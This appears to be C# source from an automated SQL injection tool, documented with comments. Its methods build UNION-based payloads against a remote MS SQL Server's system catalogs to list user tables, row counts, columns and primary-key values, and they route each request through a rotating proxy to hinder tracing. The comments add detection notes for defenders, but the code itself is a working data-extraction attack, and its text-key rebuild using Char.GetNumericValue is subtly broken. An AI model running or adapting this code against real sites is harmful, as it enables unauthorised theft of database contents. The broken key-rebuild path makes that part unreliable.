/// <summary>
/// Pulls the next column (the first one whose <c>colid</c> is greater than <paramref name="FieldID"/>)
/// of the table identified by <paramref name="TableID"/> from the target's <c>syscolumns</c> catalog
/// view, then checks <c>sysconstraints</c> to flag it as a primary key.
/// Both lookups overwrite <c>_AttackParams[_VectorName]</c> and issue a request through
/// <c>httpConnect.PageRequest</c>; the method therefore has side effects on shared instance state.
/// </summary>
/// <param name="TableID">Object id of the table whose columns are being enumerated.</param>
/// <param name="FieldID">Column id of the previously retrieved column; the query asks for <c>colid &gt; FieldID</c>.</param>
/// <returns>A <c>GlobalDS.Field</c> with <c>FieldName</c>, <c>DataType</c> and <c>IsPrimary</c> populated.</returns>
/// <remarks>
/// Detection note: the probes are recognisable by their shape — a UNION-style select against
/// <c>syscolumns</c> / <c>sysconstraints</c> with <c>char(58)</c> (a colon) used as the field delimiter.
/// Database audit or WAF rules that match on system-catalog names combined with <c>char(58)</c>
/// concatenation will see this traffic. <c>RotatedProxy()</c> is presumably a per-request proxy,
/// so correlating on source IP alone is unlikely to group these requests — confirm against its implementation.
/// </remarks>
private GlobalDS.Field GetFieldData(long TableID, int FieldID)
{
    GlobalDS.Field retVal = new GlobalDS.Field();
    StringBuilder WhereClause = new StringBuilder();
    WhereClause.Append("id=").Append(TableID).Append(" and colid > ").Append(FieldID);
    // First probe: "<name>:<xtype>" for the next column after FieldID.
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("name + char(58)+convert(char,xtype)", "syscolumns", WhereClause.ToString());
    string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    string PulledData = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);
    // Assumes the parsed text contains a colon; values[1] throws IndexOutOfRangeException otherwise.
    string[] values = PulledData.Split(':');
    retVal.FieldName = values[0];
    retVal.DataType = GetSqlDataType(Convert.ToInt64(values[1].Trim()));
    // Second probe: ":<status>" from sysconstraints for this exact column.
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, status)", "sysconstraints", "id=" + TableID + " and colid=" + FieldID);
    ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    PulledData = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
    if (PulledData.Length > 0)
    {
        // Drop the leading colon delimiter, then test the low bit of the status value.
        // IsPrimary is left at its default when no constraint row comes back.
        PulledData = PulledData.Substring(1, PulledData.Length - 1);
        retVal.IsPrimary = ((Convert.ToInt32(PulledData.Trim()) & 1) == 1);
    }
    return(retVal);
}
/// <summary>
/// Retrieves the next user table (<c>xtype = char(85)</c>, i.e. 'U') from the target's
/// <c>sysobjects</c> catalog view whose object id is greater than <paramref name="PreviousTableID"/>,
/// then issues a second request for that table's row count.
/// Each step overwrites <c>_AttackParams[_VectorName]</c> and calls <c>httpConnect.PageRequest</c>.
/// </summary>
/// <param name="PreviousTableID">Object id of the last table returned; enumeration resumes after it.</param>
/// <returns>
/// A <c>GlobalDS.Table</c> with <c>Name</c>, <c>ObjectID</c> and <c>RecordCount</c> set.
/// <c>RecordCount</c> is -1 when the second probe yields no text.
/// </returns>
/// <remarks>
/// Detection note: as with the other probes in this class, the distinguishing features are the
/// <c>sysobjects</c> reference, the <c>xtype=char(85)</c> filter and the <c>char(58)</c> delimiter.
/// The second probe selects <c>count(*)</c> directly from the discovered table name, so a successful
/// first probe is immediately followed by a request naming a real table — a useful ordering to alert on.
/// </remarks>
private GlobalDS.Table RetrieveTable(long PreviousTableID)
{
    GlobalDS.Table retVal = new GlobalDS.Table();
    // Probe 1: "<name>:<id>" for the next user table after PreviousTableID.
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, name + char(58) + convert(char, id))", "sysobjects", "xtype=char(85) and id > " + PreviousTableID.ToString());
    string ResultPage, ResultText;
    ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);
    // Assumes a colon is present; values[1] throws IndexOutOfRangeException otherwise.
    string[] values = ResultText.Split(':');
    retVal.Name = values[0];
    retVal.ObjectID = Convert.ToInt64(values[1]);
    // Probe 2: ":<count>" — note the table name comes straight from the previous response.
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, char(58) + convert(char, count(*)))", values[0], null);
    ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
    if (ResultText.Length > 0)
    {
        // Strip the leading colon delimiter before converting.
        ResultText = ResultText.Substring(1, ResultText.Length - 1);
        retVal.RecordCount = Convert.ToInt64(ResultText.Trim());
    }
    else
    {
        // Sentinel for "count not obtained".
        retVal.RecordCount = -1;
    }
    return(retVal);
}
/// <summary>
/// Asks the target for the number of user tables (<c>xtype = char(85)</c>) in <c>sysobjects</c>.
/// Overwrites <c>_AttackParams[_VectorName]</c> and performs one request via <c>httpConnect.PageRequest</c>.
/// </summary>
/// <returns>The parsed table count.</returns>
/// <remarks>
/// The response text is expected to be wrapped in a colon on each side (<c>char(58)</c> before and after
/// the count); the <c>Substring(1, Length - 2)</c> call assumes at least two characters and throws
/// <see cref="ArgumentOutOfRangeException"/> on a shorter result, and <c>Convert.ToInt64</c> throws
/// <see cref="FormatException"/> if the remaining text is not numeric.
/// </remarks>
private long GetTableCount()
{
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58)+convert(char,count(name))+char(58)", "sysobjects", "xtype=char(85)");
    string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    string PulledCount = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
    // Drop the leading and trailing colon delimiters.
    PulledCount = PulledCount.Substring(1, PulledCount.Length - 2).Trim();
    return(Convert.ToInt64(PulledCount));
}
/// <summary>
/// Fetches the smallest value of <paramref name="KeyName"/> in <paramref name="TableName"/> that is
/// greater than the current key (when <paramref name="CurrentPrimaryKey"/> refers to the same key name),
/// i.e. steps to the next row in key order. Overwrites <c>_AttackParams[_VectorName]</c> and performs
/// one request via <c>httpConnect.PageRequest</c>.
/// </summary>
/// <param name="TableName">Table to read the key from; used verbatim in the generated select.</param>
/// <param name="KeyName">Column name of the key; used verbatim in <c>min(...)</c> and the where clause.</param>
/// <param name="CurrentPrimaryKey">The previously returned key; its <c>Value</c> becomes the lower bound when its <c>Name</c> matches <paramref name="KeyName"/>.</param>
/// <param name="PrimaryKeyType">Decides whether the returned value is re-encoded as a <c>char(n) + ...</c> expression (text types) or trimmed as-is.</param>
/// <returns>
/// A new <c>GlobalDS.PrimaryKey</c>: <c>Name</c> is <paramref name="KeyName"/>, <c>Value</c> is the
/// form used in the next where clause, <c>OutputValue</c> is the raw text pulled from the page.
/// </returns>
/// <remarks>
/// <c>ResultText.Substring(1, Length - 2)</c> assumes the response is colon-delimited on both ends and
/// throws <see cref="ArgumentOutOfRangeException"/> on a result shorter than two characters.
/// For text key types the value is rebuilt character by character; note that
/// <c>Char.GetNumericValue</c> is what the code uses for each character — whatever it yields is what is appended.
/// </remarks>
private GlobalDS.PrimaryKey IteratePrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey, SqlDbType PrimaryKeyType)
{
    StringBuilder WhereClause = new StringBuilder();
    // Only constrain the query once we are iterating over the same key; the first call has no lower bound.
    if (CurrentPrimaryKey.Name == KeyName)
    {
        WhereClause.Append(KeyName).Append(" > ").Append(CurrentPrimaryKey.Value);
    }
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, min(" + KeyName + ")) + char(58)", TableName, WhereClause.ToString());
    string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    string ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
    // Strip the leading and trailing colon delimiters.
    ResultText = ResultText.Substring(1, ResultText.Length - 2);
    string WorkingText = "";
    switch (PrimaryKeyType)
    {
        case SqlDbType.VarChar:
        case SqlDbType.Char:
        case SqlDbType.NChar:
        case SqlDbType.NText:
        case SqlDbType.NVarChar:
        case SqlDbType.Text:
            // Text keys: rebuild the value as a "char(n) + char(n) + ..." expression for the next where clause.
            StringBuilder ElementBuilder = new StringBuilder();
            //split
            char[] TextElements = ResultText.ToCharArray();
            for (int i = 0; i < TextElements.Length; i++)
            {
                ElementBuilder.Append("char(").Append(Char.GetNumericValue(TextElements[i])).Append(") + ");
            }
            // Remove the trailing "+ " left by the loop; throws if ResultText was empty (nothing appended).
            ElementBuilder.Remove(ElementBuilder.Length - 2, 2); // remove trailing '+ '
            WorkingText = ElementBuilder.ToString();
            break;
        default:
            // Non-text keys are used as-is (numeric comparison in the next where clause).
            WorkingText = ResultText.Trim();
            break;
    }
    GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey();
    retVal.Name = KeyName;
    retVal.Value = WorkingText;
    retVal.OutputValue = ResultText;
    return(retVal);
}